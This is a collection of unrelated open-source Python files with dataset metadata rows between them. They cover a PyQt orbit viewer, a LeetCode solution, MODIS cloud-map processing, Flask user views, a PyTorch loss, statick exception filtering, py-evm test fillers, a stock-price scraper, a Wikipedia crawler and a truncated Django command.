        with open(file_name, 'w') as f:
            keys = ["SMA", "INC", "ECC", "LAN", "AOP", "MA"]
            values = self.getSliderValues()
            json.dump(dict(zip(keys, values)), f)

    def import_from_json(self):
        """Load slider values from a user-chosen JSON file and apply them."""
        file_name = self.FileDialog(save=False)
        with open(file_name, 'r') as f:
            content = json.load(f)
        self.setSliderValues(content)

    def FileDialog(self, save=True):
        """Open a save/open dialog and return the chosen path, forcing .json."""
        options = QFileDialog.Options()
        options |= QFileDialog.DontUseNativeDialog
        if save:
            file_name, _ = QFileDialog.getSaveFileName(
                self, "Save as", "", "JSON Files (*.json)", options=options)
        else:
            file_name, _ = QFileDialog.getOpenFileName(
                self, "Open", "", "JSON Files (*.json)", options=options)
        if file_name != '':
            if not file_name.endswith('.json'):
                file_name += '.json'
        return file_name

    def display_planets(self):
        """React to checked planet menu actions."""
        # NOTE(review): currently only prints a placeholder; plotting of the
        # selected planets is not implemented yet.
        for planet in self.planet_actions:
            if planet.isChecked():
                print('hello')
if __name__ == "__main__":
app = QApplication(sys.argv)
app.setStyle("Fusion")
dark_palette = QPalette()
dark_palette.setColor(QPalette.Window, QColor(51, 54, 63))
dark_palette.setColor(QPalette.WindowText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Base, QColor(39, 42, 49))
dark_palette.setColor(QPalette.AlternateBase, QColor(51, 54, 63))
dark_palette.setColor(QPalette.ToolTipBase, QColor(250, 250, 250))
dark_palette.setColor(QPalette.ToolTipText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Text, QColor(250, 250, 250))
dark_palette.setColor(QPalette.Button, QColor(51, 54, 63))
dark_palette.setColor(QPalette.ButtonText, QColor(250, 250, 250))
dark_palette.setColor(QPalette.BrightText, QColor(255, 0, 0))
dark_palette.setColor(QPalette.Link, QColor(42, 130, 218))
dark_palette.setColor(QPalette.Highlight, QColor(42, 130, 218))
dark_palette.setColor(QPalette.HighlightedText, QColor(0, 0, 0))
app.setPalette(dark_palette)
plot_background_color = (51/255, 54/255, 63/255)
plot_face_color = (39/255, 42/255, 49/255)
win = MainWindow()
mw = qtmodern.windows.ModernWindow(win)
mw.show()
sys.exit(app.exec_())
| Keith-Maxwell/OrbitViewer | OrbitViewer.py | OrbitViewer.py | py | 6,219 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "MyModules.MyWindow.Ui_MainWindow",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QDesktopWidget",
"line_number": 45,
"usage_type": "call"
}... |
19499771211 | # -*- coding: utf-8 -*-
from typing import List
import math
class Solution:
    def nearestValidPoint(self, x: int, y: int, points: List[List[int]]) -> int:
        """Return the index of the closest point sharing a coordinate with (x, y).

        A point is "valid" when its x or y equals the target's; distance is
        Manhattan.  Ties keep the earliest index; -1 when no point is valid.
        """
        best_index = -1
        best_distance = math.inf
        for i, (px, py) in enumerate(points):
            if px != x and py != y:
                continue  # only axis-aligned points count
            distance = abs(px - x) + abs(py - y)
            if distance < best_distance:
                best_distance, best_index = distance, i
        return best_index
# vim: autoindent tabstop=4 shiftwidth=4 expandtab softtabstop=4
| michaeldye/mdye-python-samples | src/mdye_leetcode/solution_1779.py | solution_1779.py | py | 591 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "math.inf",
"line_number": 10,
"usage_type": "attribute"
}
] |
5995774734 | #!/usr/bin/python
from pylab import *
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.cm as cm
from pyhdf.SD import SD,SDC
import healpy as hp
import os
def modisfile(month, day=None, year=2016, datadir="/home/kawahara/exomap/sot/data/aux/"):
    """Resolve the MODIS HDF file name for a given date.

    With day=None the monthly index (modisM.txt) is searched and the file for
    (year, month) is returned with day left as None.  Otherwise the daily
    index (modisE.txt) is searched for an exact (year, month, day) match;
    when none exists the entry of that month with the nearest day is used
    instead (and a message is printed).

    Returns (filename, month, day); day may have been replaced by the nearest
    available day.
    """
    import pandas as pd
    if day is None:
        dat = pd.read_csv(os.path.join(datadir, "modisM.txt"), delimiter=",")
        # Year was previously hard-coded to 2016; now honours the argument.
        ext = dat[(dat["YEAR"] == year) & (dat["MONTH"] == month)]
        out = str(ext["FILE"].tolist()[0])
    else:
        dat = pd.read_csv(os.path.join(datadir, "modisE.txt"), delimiter=",")
        try:
            ext = dat[(dat["YEAR"] == year) & (dat["MONTH"] == month) & (dat["DAY"] == day)]
            out = str(ext["FILE"].tolist()[0])
        except (IndexError, KeyError):
            # No exact match for the requested day (empty selection raised
            # IndexError): fall back to the nearest available day in the
            # same (year, month).  Was a bare `except:`.
            ext = dat[(dat["YEAR"] == year) & (dat["MONTH"] == month)]
            i = np.argmin(np.abs(ext["DAY"] - day))
            out = str(ext["FILE"].tolist()[i])
            day = ext["DAY"].tolist()[i]
            print("Nearest Day is used day=", day)
    return out, month, day
def read_cloud(hdffile,N=1):
    """Read the Cloud_Fraction_Mean_Mean SDS from a MODIS MYD08 HDF4 file.

    N -- subsampling stride: every N-th row and column is kept.
    Fill values become NaN, then the add_offset/scale_factor calibration
    stored in the dataset attributes is applied.  Returns a 2-D float array.
    """
    print(hdffile)
    f = SD(hdffile,SDC.READ)
    v=f.select("Cloud_Fraction_Mean_Mean")
    # Calibration metadata stored as SDS attributes.
    vr=v.attributes()["valid_range"]
    # NOTE(review): vr (valid_range) is read but never used below.
    fv=v.attributes()["_FillValue"]
    ao=v.attributes()["add_offset"]
    sf=v.attributes()["scale_factor"]
    a=np.array(v[::N,::N],dtype=float)
    # Assigning None into a float array stores NaN at the fill positions.
    a[a==fv] = None
    # Apply the (value - offset) * scale calibration.
    a=(a-ao)*sf
    return a
def to_healpix(a,nside=16):
    """Resample a 1-degree equirectangular map onto a HEALPix grid.

    Each HEALPix pixel center is converted to (colatitude, longitude) in
    degrees and the value of the containing 1-degree cell is copied
    (nearest-neighbour lookup, no averaging).  Assumes `a` is indexed as
    a[colat_deg, lon_deg], i.e. shape (180, 360) -- TODO confirm against
    read_cloud's output.
    """
    Nphi,Ntheta=np.shape(a)
    # NOTE(review): Nphi/Ntheta are unpacked but unused below.
    npix=hp.nside2npix(nside)
    hmap=np.zeros(npix)
    for ipix in range(0,npix):
        theta,phi=hp.pix2ang(nside,ipix)
        # Truncate to integer degrees to index the source grid.
        itheta=int(theta/np.pi*180)
        iphi=int(phi/np.pi*180)
        hmap[ipix]=float(a[itheta,iphi])
    return hmap
if __name__ == "__main__":
import os
import plotdymap
import matplotlib
fontsize=16
matplotlib.rcParams.update({'font.size':fontsize})
thetaE,phiE=plotdymap.bound_earth("/home/kawahara/exomap/sot/data/earth_boundary.npz")
year=2016
month=5
day=11
hdffile,month,day=modisfile(month,day,year=year)
hdfdir="/home/kawahara/exomap/data/modis/MYD08"
hdffile=os.path.join(hdfdir,hdffile)
a=read_cloud(hdffile,N=1)
hmap=to_healpix(a,nside=16)
hp.mollview(hmap, title=str(year)+"-"+str(month)+"-"+str(day),flip="geo",cmap=plt.cm.pink,min=0.5,max=1.0)
hp.projplot(thetaE, phiE,".",c="#66CC99")
hp.projtext(-60,-25,"A",coord="G",lonlat=True,color="cyan",fontsize=26) #amazon
# hp.projtext(-130,30,"B",coord="G",lonlat=True,color="cyan",fontsize=26) #north america
plt.savefig("cf"+str(year)+"_"+str(month)+"_"+str(day)+".pdf")
plt.show()
| HajimeKawahara/sot | src/sot/dymap/analyzeMYD.py | analyzeMYD.py | py | 2,825 | python | en | code | 4 | github-code | 6 | [
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "pandas.read_csv",
"line... |
42420664031 | import requests, json
# Fetch a single survey record from the sandbox Demand API and persist the
# raw response body to survey_get.json.
url = 'https://sandbox.techops.engineering/Demand/v1/Surveys/BySurveyNumber/4592039'
params = ""
headers = {'Content-type': 'application/json', 'Authorization' : 'YOUR_API_KEY_HERE', 'Accept': 'text/plain'}
response = requests.get(url, data=params, headers=headers)
print(response.content.decode())
# The context manager guarantees the file is closed even if the write fails
# (previously a manual open/write/close sequence).
with open("survey_get.json", "w") as file:
    file.write(response.text)
| ajay-ar30/lucidcodesproject | week5/survey_get.py | survey_get.py | py | 398 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "requests.get",
"line_number": 6,
"usage_type": "call"
}
] |
11983564091 | # -*- coding: utf-8 -*-
import sys
from ccm import *
from PyQt5.QtWidgets import QMainWindow, QApplication
class CCMWindow(QMainWindow):
    """Main application window wrapping the generated Ui_CCMTask layout."""

    def __init__(self):
        super().__init__()
        # Ui_CCMTask comes from the wildcard `from ccm import *` at module level.
        self.ui = Ui_CCMTask()
        self.ui.setupUi(self)
        self.ui.retranslateUi(self)
        self.show()
if __name__ == '__main__':
app = QApplication(sys.argv)
mainWindow = CCMWindow()
mainWindow.setWindowFlags(QtCore.Qt.WindowMinimizeButtonHint)
mainWindow.setFixedSize(mainWindow.width(), mainWindow.height())
mainWindow.show()
sys.exit(app.exec_()) | yyFFans/DemoPractises | CCMtask/startui.py | startui.py | py | 581 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 8,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtWidgets.QApplication",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": ... |
29915222521 | # -*- coding: utf-8 -*-
"""User views."""
from flask import Blueprint, render_template, request, flash, redirect, url_for
from flask_login import login_required, current_user
from food_journal.user.models import User
from food_journal.user.forms import EditProfileForm
blueprint = Blueprint("user", __name__, url_prefix="/users", static_folder="../static")
@blueprint.route("/")
@login_required
def members():
"""List members."""
return render_template("users/members.html")
@blueprint.route("/<username>")
@login_required
def profile(username):
"""Return user's profile page"""
print("here")
user = User.query.filter_by(username=username).first_or_404()
return render_template("users/profile.html", user=user)
@blueprint.route('/edit_profile', methods=['GET', 'POST'])
@login_required
def edit_profile():
    """Show and process the current user's profile-editing form."""
    form = EditProfileForm()
    if form.validate_on_submit():
        # Valid POST: persist the change and redirect (post/redirect/get).
        current_user.update(about_me=form.about_me.data)
        flash("Your changes have been saved.")
        return redirect(url_for('user.edit_profile'))
    elif request.method == 'GET':
        # Pre-populate the form with the stored value.
        form.about_me.data = current_user.about_me
    return render_template('users/edit_profile.html', title='Edit Profile', form=form)
@blueprint.route('/follow/<username>')
@login_required
def follow(username):
    """Make the current user follow *username*, then redirect to their profile."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('User {} not found'.format(username))
        # Was url_for('index'); the blueprint-qualified endpoint matches
        # unfollow() below.
        return redirect(url_for('public.index'))
    if user == current_user:
        flash('You cannot follow yourself!')
        # Was url_for('user', ...); 'user' is the blueprint name, not a
        # registered endpoint, which raises BuildError at runtime.
        return redirect(url_for('user.profile', username=username))
    current_user.follow(user)
    current_user.save()
    flash('You are now following {}!'.format(username))
    return redirect(url_for('user.profile', username=username))
@blueprint.route('/unfollow/<username>')
@login_required
def unfollow(username):
    """Make the current user unfollow *username*, then redirect to their profile."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        flash('User {} not found.'.format(username))
        return redirect(url_for('public.index'))
    if user == current_user:
        flash('You cannot unfollow yourself!')
        return redirect(url_for('user.profile', username=username))
    current_user.unfollow(user)
    current_user.save()
    flash('You are not following {}.'.format(username))
    return redirect(url_for('user.profile', username=username))
| ariesunique/food-journal | food_journal/user/views.py | views.py | py | 2,403 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Blueprint",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "flask.render_template",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "flask_login.login_required",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "food_... |
27108312423 | import math
import plotly
import dash_bootstrap_components as dbc
from dash import html, dcc
import dash
from django_plotly_dash import DjangoDash
from geopy.geocoders import ArcGIS
import plotly.graph_objects as go
import plotly.express as px
import multiprocessing
import re
import pandas as pd
class Mapa:
    """Dash map component plotting geocoded locations from a dataframe column."""

    def __init__(self, df, col):
        # col: name of the dataframe column holding the address/location text.
        self.col = col
        self.df = df

    def criar_mapa(self):
        """Create the DjangoDash app whose single graph is the generated map."""
        app = DjangoDash("mapa",
                         add_bootstrap_links=True)
        app.layout = html.Div(
            dcc.Graph(id='mapa', figure=self.gerar_grafico()))
        return app

    def encontrar_coordenadas(self, x):
        """Geocode the free-text location *x* via ArcGIS; None when not found."""
        nom = ArcGIS()
        coordenada = nom.geocode(x)
        if coordenada:
            return coordenada.latitude, coordenada.longitude

    def requisicao(self, df):
        """Add Latitude/Longitude columns by geocoding each row.

        One network request per row -- slow for large frames.
        """
        df[['Latitude', 'Longitude']] = df[self.col].apply(lambda x: pd.Series(self.encontrar_coordenadas(x)))
        return df

    def gerar_grafico(self):
        """Build the scattermapbox figure centered and zoomed on the markers."""
        df = self.requisicao(self.df)
        fig = go.Figure(go.Scattermapbox(
            lat=df['Latitude'],
            lon=df['Longitude'],
            mode='markers',
            marker=go.scattermapbox.Marker(
                size=15,
                color='rgb(0, 100, 58)',
                opacity=0.7
            ),
            text=df,
        ))
        # Configure the base map layout.
        fig.update_layout(
            mapbox_style='open-street-map',
            mapbox_center_lon=0,
            margin={'r': 0, 't': 0, 'l': 0, 'b': 0}
        )
        # Bounding box of the plotted coordinates.
        lat_min, lat_max = df['Latitude'].min(), df['Latitude'].max()
        lon_min, lon_max = df['Longitude'].min(), df['Longitude'].max()
        # Center of the map.
        center_lat = (lat_min + lat_max) / 2
        center_lon = (lon_min + lon_max) / 2
        # Extent of the coordinates.
        lat_extent = lat_max - lat_min
        lon_extent = lon_max - lon_min
        # Zoom level derived from the extents.
        # NOTE(review): a zero extent (single point or identical coordinates)
        # divides by zero here -- confirm inputs always span an area.
        zoom_lat = math.log10(360 / lat_extent) / math.log10(2)
        zoom_lon = math.log10(360 / lon_extent) / math.log10(2)
        zoom = min(zoom_lat, zoom_lon)
        # Apply the zoom centred on the marked coordinates.
        fig.update_layout(
            mapbox={
                'center': {'lon': center_lon, 'lat': center_lat},
                'zoom': zoom
            }
        )
        return fig
{
"api_name": "django_plotly_dash.DjangoDash",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "dash.html.Div",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "dash.html",
"line_number": 23,
"usage_type": "name"
},
{
"api_name": "dash.dcc.Graph"... |
26776110880 | """Exceptions interface.
Exceptions allow for ignoring detected issues. This is commonly done to suppress false
positives or to ignore issues that a group has no intention of addressing.
The two types of exceptions are a list of filenames or regular expressions. If using
filename matching for the exception it is required that the reported issue contain the
absolute path to the file containing the issue to be ignored. The path for the issue is
set in the tool plugin that generates the issues.
"""
import fnmatch
import logging
import os
import re
from typing import Any, Dict, List, Match, Optional, Pattern
import yaml
from statick_tool.issue import Issue
from statick_tool.package import Package
class Exceptions:
    """Interface for applying exceptions."""

    def __init__(self, filename: Optional[str]) -> None:
        """Initialize exceptions interface."""
        if not filename:
            # Include the offending value in the message (was a placeholder).
            raise ValueError(f"{filename} is not a valid file")
        with open(filename, encoding="utf8") as fname:
            try:
                self.exceptions: Dict[Any, Any] = yaml.safe_load(fname)
            except (yaml.YAMLError, yaml.scanner.ScannerError) as ex:
                raise ValueError(f"{filename} is not a valid YAML file: {ex}") from ex

    def get_ignore_packages(self) -> List[str]:
        """Get list of packages to skip when scanning a workspace."""
        ignore: List[str] = []
        if (
            "ignore_packages" in self.exceptions
            and self.exceptions["ignore_packages"] is not None
        ):
            ignore = self.exceptions["ignore_packages"]
        return ignore

    def get_exceptions(self, package: Package) -> Dict[Any, Any]:
        """Get specific exceptions for given package."""
        exceptions: Dict[Any, Any] = {"file": [], "message_regex": []}
        if "global" in self.exceptions and "exceptions" in self.exceptions["global"]:
            global_exceptions = self.exceptions["global"]["exceptions"]
            if "file" in global_exceptions and global_exceptions["file"]:
                exceptions["file"] += global_exceptions["file"]
            if (
                "message_regex" in global_exceptions
                and global_exceptions["message_regex"]
            ):
                exceptions["message_regex"] += global_exceptions["message_regex"]
        # pylint: disable=too-many-boolean-expressions
        if (
            self.exceptions
            and "packages" in self.exceptions
            and self.exceptions["packages"]
            and package.name in self.exceptions["packages"]
            and self.exceptions["packages"][package.name]
            and "exceptions" in self.exceptions["packages"][package.name]
        ):
            package_exceptions = self.exceptions["packages"][package.name]["exceptions"]
            if "file" in package_exceptions:
                exceptions["file"] += package_exceptions["file"]
            if "message_regex" in package_exceptions:
                exceptions["message_regex"] += package_exceptions["message_regex"]
        # pylint: enable=too-many-boolean-expressions
        return exceptions

    def filter_file_exceptions_early(
        self, package: Package, file_list: List[str]
    ) -> List[str]:
        """Filter files based on file pattern exceptions list.

        Only filters files which have tools=all, intended for use after the discovery
        plugins have been run (so that Statick doesn't run the tool plugins against
        files which will be ignored anyway).
        """
        exceptions: Dict[Any, Any] = self.get_exceptions(package)
        to_remove = []
        for filename in file_list:
            removed = False
            for exception in exceptions["file"]:
                if exception["tools"] == "all":
                    for pattern in exception["globs"]:
                        # Hack to avoid exceptions for everything on Travis CI.
                        fname = filename
                        prefix = "/home/travis/build/"
                        if pattern == "*/build/*" and fname.startswith(prefix):
                            fname = fname[len(prefix) :]
                        if fnmatch.fnmatch(fname, pattern):
                            to_remove.append(filename)
                            removed = True
                            break
                if removed:
                    break
        file_list = [filename for filename in file_list if filename not in to_remove]
        return file_list

    def filter_file_exceptions(
        self, package: Package, exceptions: List[Any], issues: Dict[str, List[Issue]]
    ) -> Dict[str, List[Issue]]:
        """Filter issues based on file pattern exceptions list."""
        for tool, tool_issues in list(  # pylint: disable=too-many-nested-blocks
            issues.items()
        ):
            warning_printed = False
            to_remove: List[Issue] = []
            for issue in tool_issues:
                if not os.path.isabs(issue.filename):
                    # File exceptions require absolute issue paths; warn once
                    # per tool and keep the issue.
                    if not warning_printed:
                        self.print_exception_warning(tool)
                        warning_printed = True
                    continue
                rel_path: str = os.path.relpath(issue.filename, package.path)
                for exception in exceptions:
                    if exception["tools"] == "all" or tool in exception["tools"]:
                        for pattern in exception["globs"]:
                            # Hack to avoid exceptions for everything on Travis CI.
                            fname: str = issue.filename
                            prefix: str = "/home/travis/build/"
                            if pattern == "*/build/*" and fname.startswith(prefix):
                                fname = fname[len(prefix) :]
                            if fnmatch.fnmatch(fname, pattern) or fnmatch.fnmatch(
                                rel_path, pattern
                            ):
                                to_remove.append(issue)
            issues[tool] = [issue for issue in tool_issues if issue not in to_remove]
        return issues

    @classmethod
    def filter_regex_exceptions(
        cls, exceptions: List[Any], issues: Dict[str, List[Issue]]
    ) -> Dict[str, List[Issue]]:
        """Filter issues based on message regex exceptions list."""
        for exception in exceptions:  # pylint: disable=too-many-nested-blocks
            exception_re = exception["regex"]
            exception_tools = exception["tools"]
            exception_globs = []
            if "globs" in exception:
                exception_globs = exception["globs"]
            try:
                compiled_re: Pattern[str] = re.compile(exception_re)
            except re.error:
                logging.warning(
                    "Invalid regular expression in exception: %s", exception_re
                )
                continue
            for tool, tool_issues in list(issues.items()):
                to_remove = []
                if exception_tools == "all" or tool in exception_tools:
                    for issue in tool_issues:
                        if exception_globs:
                            # When globs are given, the regex only applies to
                            # issues in matching files.
                            for pattern in exception_globs:
                                if fnmatch.fnmatch(issue.filename, pattern):
                                    match: Optional[Match[str]] = compiled_re.match(
                                        issue.message
                                    )
                                    if match:
                                        to_remove.append(issue)
                        else:
                            match_re: Optional[Match[str]] = compiled_re.match(
                                issue.message
                            )
                            if match_re:
                                to_remove.append(issue)
                issues[tool] = [
                    issue for issue in tool_issues if issue not in to_remove
                ]
        return issues

    def filter_nolint(self, issues: Dict[str, List[Issue]]) -> Dict[str, List[Issue]]:
        """Filter out lines that have an explicit NOLINT on them.

        Sometimes the tools themselves don't properly filter these out if there is a
        complex macro or something.
        """
        for tool, tool_issues in list(issues.items()):
            warning_printed: bool = False
            to_remove: List[Issue] = []
            for issue in tool_issues:
                if not os.path.isabs(issue.filename):
                    if not warning_printed:
                        self.print_exception_warning(tool)
                        warning_printed = True
                    continue
                try:
                    with open(issue.filename, encoding="utf-8") as fid:
                        try:
                            lines = fid.readlines()
                        except UnicodeDecodeError as exc:
                            logging.warning(
                                "Could not read %s: %s", issue.filename, exc
                            )
                            continue
                except FileNotFoundError as exc:
                    logging.warning("Could not read %s: %s", issue.filename, exc)
                    continue
                if len(lines) <= 0:
                    continue
                # Issue line numbers are 1-based; the lines list is 0-based.
                line_number = int(issue.line_number) - 1
                if line_number < len(lines) and "NOLINT" in lines[line_number]:
                    to_remove.append(issue)
            issues[tool] = [issue for issue in tool_issues if issue not in to_remove]
        return issues

    def filter_issues(
        self, package: Package, issues: Dict[str, List[Issue]]
    ) -> Dict[str, List[Issue]]:
        """Filter issues based on exceptions list."""
        exceptions = self.get_exceptions(package)
        if exceptions["file"]:
            issues = self.filter_file_exceptions(package, exceptions["file"], issues)
        if exceptions["message_regex"]:
            issues = self.filter_regex_exceptions(exceptions["message_regex"], issues)
        issues = self.filter_nolint(issues)
        return issues

    @classmethod
    def print_exception_warning(cls, tool: str) -> None:
        """Print warning about exception not being applied for an issue.

        Warning will only be printed once per tool.
        """
        logging.warning(
            "[WARNING] File exceptions not available for %s tool "
            "plugin due to lack of absolute paths for issues.",
            tool,
        )
| sscpac/statick | statick_tool/exceptions.py | exceptions.py | py | 10,625 | python | en | code | 66 | github-code | 6 | [
{
"api_name": "typing.Optional",
"line_number": 26,
"usage_type": "name"
},
{
"api_name": "typing.Dict",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "typing.Any",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "yaml.safe_load",
"line_num... |
20594488232 | import torch
import torch.nn as nn
def domain_loss(visual_domain_logits, textual_domain_logits):
    """Cross-entropy loss for a modality (domain) classifier.

    Visual samples are labelled class 0 and textual samples class 1, so the
    returned value is the sum of the two per-modality cross-entropy terms.

    Args:
        visual_domain_logits: (batch, num_domains) logits for visual inputs —
            presumably num_domains == 2.
        textual_domain_logits: (batch, num_domains) logits for textual inputs.

    Returns:
        Scalar tensor: CE(visual, 0) + CE(textual, 1).
    """
    criterion = nn.CrossEntropyLoss()
    batch_size = visual_domain_logits.shape[0]
    # Create labels on the same device as the logits instead of hard-coding
    # .cuda(): identical behaviour on GPU, and the loss now also works on CPU
    # (the original crashed without CUDA).
    device = visual_domain_logits.device
    visual_domain_labels = torch.zeros(batch_size, dtype=torch.long, device=device)
    textual_domain_labels = torch.ones(batch_size, dtype=torch.long, device=device)
    loss = criterion(visual_domain_logits, visual_domain_labels) + criterion(
        textual_domain_logits, textual_domain_labels
    )
    return loss
| CCNU-DigitalLibrary/CCNU-DigitalLibrary | MCM-HC/lib/models/losses/domain_loss.py | domain_loss.py | py | 467 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "torch.nn.CrossEntropyLoss",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torch.nn",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "torch.zeros",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_nu... |
7177357229 | import json
import os
from eth_hash.auto import (
keccak,
)
from eth_utils import (
encode_hex,
)
from eth.tools.fixtures.fillers import (
fill_test,
)
from eth.tools.fixtures.fillers.formatters import (
filler_formatter,
)
from eth.tools.fixtures.helpers import (
get_test_name,
)
PARENT_DIR = os.path.dirname(os.path.abspath(__file__))
OUTPUT_DIR = os.path.join(PARENT_DIR, "json")
FILLER_PARENT_DIR = os.path.join(OUTPUT_DIR, "fillers")
TEST_PARENT_DIR = os.path.join(OUTPUT_DIR, "tests")
DIR_STRUCTURE = {}
if __name__ == "__main__":
    # DIR_STRUCTURE maps (filler_dir, test_dir) -> {test_group: [(filler, kwargs), ...]}.
    # It is empty in this file, so this driver is a no-op until fillers are
    # registered; the loop documents the intended generation pipeline.
    for (filler_dir, test_dir), test_groups in DIR_STRUCTURE.items():
        for test_group, tests in test_groups.items():
            for filler, filler_kwargs in tests:
                test_name = get_test_name(filler)
                filename = test_name + ".json"
                # Filler JSON lives under FILLER_PARENT_DIR and the generated
                # test under TEST_PARENT_DIR, mirroring the group layout.
                filler_src_path = os.path.join(filler_dir, test_group, filename)
                filler_path = os.path.join(FILLER_PARENT_DIR, filler_src_path)
                test_path = os.path.join(
                    TEST_PARENT_DIR, test_dir, test_group, filename
                )
                for path in [filler_path, test_path]:
                    os.makedirs(os.path.dirname(path), exist_ok=True)
                formatted_filler = filler_formatter(filler)
                filler_string = json.dumps(formatted_filler, indent=4, sort_keys=True)
                with open(filler_path, "w") as filler_file:
                    filler_file.write(filler_string)
                # The generated test records its source filler and the keccak
                # hash of the exact filler bytes so consumers can verify
                # provenance.
                filler_hash = keccak(filler_string.encode("ascii"))
                info = {
                    "source": filler_src_path,
                    "sourceHash": encode_hex(filler_hash),
                }
                test = fill_test(filler, info=info, **filler_kwargs or {})
                with open(test_path, "w") as test_file:
                    json.dump(test, test_file, indent=4, sort_keys=True)
| ethereum/py-evm | tests/fillers/build_json.py | build_json.py | py | 1,932 | python | en | code | 2,109 | github-code | 6 | [
{
"api_name": "os.path.dirname",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line... |
71184192189 | #!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import (absolute_import, division, print_function, unicode_literals)
from multiprocessing import cpu_count
from eventlet import monkey_patch
from eventlet.greenpool import GreenPool
from contextlib import closing
monkey_patch()
import requests
try:
requests.packages.urllib3.disable_warnings()
except AttributeError:
pass
monkey_patch()
def read_stock_url(symbol):
    """Scrape the quoted price for *symbol* from its Yahoo finance page.

    Returns a (symbol, price) tuple; price is -1 when no quote is found.
    """
    sym = symbol.lower()
    urlname = 'http://finance.yahoo.com/q?s=' + sym + \
        '&ql=0'
    marker = 'yfs_l84_%s' % sym
    with closing(requests.get(urlname, stream=True)) as response:
        for raw_line in response.iter_lines():
            text = raw_line.decode(errors='ignore')
            if marker not in text:
                continue
            # The price sits between the span marker and the closing tag;
            # strip thousands separators before converting.
            tail = text.split('yfs_l84_%s\">' % sym)[1]
            value = float(tail.split('</')[0].replace(',', ''))
            return symbol, value
    return symbol, -1
def run_stock_parser():
    """Read tickers from symbols.txt, fetch quotes concurrently with green
    threads, and write the results to stock_prices.csv."""
    with open('symbols.txt', 'r') as symfile:
        stock_symbols = [line.strip() for line in symfile if line.strip()]

    # Oversubscribe the pool relative to CPU count: the work is network-bound.
    pool = GreenPool(cpu_count() * 4)
    stock_prices = list(pool.imap(read_stock_url, stock_symbols))

    with open('stock_prices.csv', 'w') as outfile:
        outfile.write('Stock,Price\n')
        for ticker, price in stock_prices:
            outfile.write('%s,%s\n' % (ticker, price))
if __name__ == '__main__':
run_stock_parser()
| ddboline/programming_tests | python/stock_parser_greenpool.py | stock_parser_greenpool.py | py | 1,591 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "eventlet.monkey_patch",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "requests.packages.urllib3.disable_warnings",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "requests.packages",
"line_number": 14,
"usage_type": "attribute"
},
... |
13842647368 | # only links are new should be crawled for additional links
# looks for all links that begin with /wiki/ (don't restrict to article links)
# collects the title, the 1st paragraph of content and the link to edit the page if available
from urllib.request import urlopen
from bs4 import BeautifulSoup
import re
pages = set()
def getLinks(pageUrl):
    """Recursively crawl Wikipedia starting from *pageUrl*.

    Prints each page's title, first content paragraph and edit link (when
    present), then follows every not-yet-seen /wiki/ link depth-first.
    """
    global pages
    html = urlopen("http://en.wikipedia.org"+pageUrl)
    soup = BeautifulSoup(html)
    try:
        print(soup.h1.get_text())
        print(soup.find(id="mw-content-text").findAll("p")[0])
        print(soup.find(id="ca-edit").find("span").find("a").attrs['href'])
    except AttributeError:
        # Not every page exposes all three elements (e.g. no edit link).
        print("this page is missing something")

    for link in soup.findAll("a", href=re.compile("^(/wiki/)")):
        if 'href' not in link.attrs:
            continue
        target = link.attrs['href']
        if target in pages:
            continue
        # New page: record it before recursing so it is never revisited.
        # NOTE(review): recursion depth is unbounded; a real crawl can hit
        # Python's recursion limit.
        print("--------------------\n"+target)
        pages.add(target)
        getLinks(target)
getLinks("")
| ViolaZhou7/2016-09-python | crawlNewLinks.py | crawlNewLinks.py | py | 1,111 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "urllib.request.urlopen",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "bs4.BeautifulSoup",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "re.compile",
"line_number": 21,
"usage_type": "call"
}
] |
39607784723 | import os
import logging
from django.core.management.base import BaseCommand
from django.core.management.base import CommandError
from core import batch_loader
from core.management.commands import configure_logging
configure_logging('process_coordinates_logging.config',
'process_coordinates_%s.log' % os.getpid())
_logger = logging.getLogger(__name__)
class Command(BaseCommand):
    """Django management command that runs word-coordinate processing for
    every batch named in a batch-list file."""

    help = "Process word coordinates for a batch by name from a batch list file"

    def add_arguments(self, parser):
        # Positional arguments
        parser.add_argument('batch_list_filename')

    def handle(self, batch_list_filename, *args, **options):
        """Process coordinates for each batch named (one per line) in the file.

        Valid batch names have exactly four underscore-separated parts;
        anything else is logged and skipped.
        """
        if len(args) != 0:
